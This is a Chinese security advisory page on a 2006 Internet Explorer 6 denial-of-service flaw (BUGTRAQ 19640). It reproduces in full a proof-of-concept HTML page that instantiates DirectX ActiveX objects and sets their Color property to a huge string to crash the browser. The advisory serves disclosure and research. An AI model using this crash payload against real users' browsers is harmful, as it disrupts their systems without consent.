Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞

9月11日，云南丽江－信息安全风险管理与评估认证培训 [admin 2006年8月10日]

	加入收藏
	设为首页
	联系站长

您现在的位置：国家信息中心安全评估网 >> 工作动态 >> 安全公告 >> 文章正文

Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞

热

【字体：小大】

Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞

作者：Internet 文章来源：Internet 点击数：更新时间：2006-8-29

发布日期：2006-08-21
更新日期：2006-08-22

受影响系统：

Microsoft Internet Explorer 6.0 SP1

描述：

BUGTRAQ  ID: 19640

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理多个COM对象（dxtmsft.dll/dxtmsft3.dll）的颜色属性输入方式时，如果将颜色属性设置为超长字符串的话，就会导致Internet Explorer崩溃。

<*来源：XSec （http://www.xsec.org）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115618755813695&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

=============== Color.htm start ================

<!--

// Internet Explorer Multiple COM Object Color Property DoS Vulnerability
// tested on Windows 2000 SP4/XP SP2

// http://www.xsec.org
// nop (nop#xsec.org)

--!>
<html>
<head>
<title></title>
</head>
</body>
<script>
var i =0;
var Objects = new Array(

// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",

// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",

// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",

// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",

// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",

// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",

null
);

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}

while(Objects[i])
{
var a = null;

window.status = "Create Object " + Objects[i] + "...";

try { a = new ActiveXObject(Objects[i]); } catch(e){}

if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}

i++;
}

window.status = "failed!";

</script>
</body>
</html>

=============== Color.htm end ==================

建议：

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

文章录入：admin 责任编辑：admin

上一篇文章： Sun Solaris文件系统管理RBAC配置文件命令执行漏洞

下一篇文章： Microsoft Windows 2000多个COM对象实例化内存破坏漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				Microsoft Windows 2000多个 Microsoft IE 6 urlmon.dll长 Microsoft IE本地函数迭代器 Microsoft Windows SMB畸形管 Microsoft IE ADODB.Records Microsoft PowerPoint文件处 Microsoft IE已删除帧对象访 Microsoft Windows GDI+库PN Microsoft PowerPoint畸形记 Microsoft Visual Basic for

　　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

国家信息中心信息安全研究与服务中心 Tel：010－68557159 Fax：010－68557158 邮编：100045 地址：北京西城区三里河路58号

站长：国家信息中心网络安全部安全评估处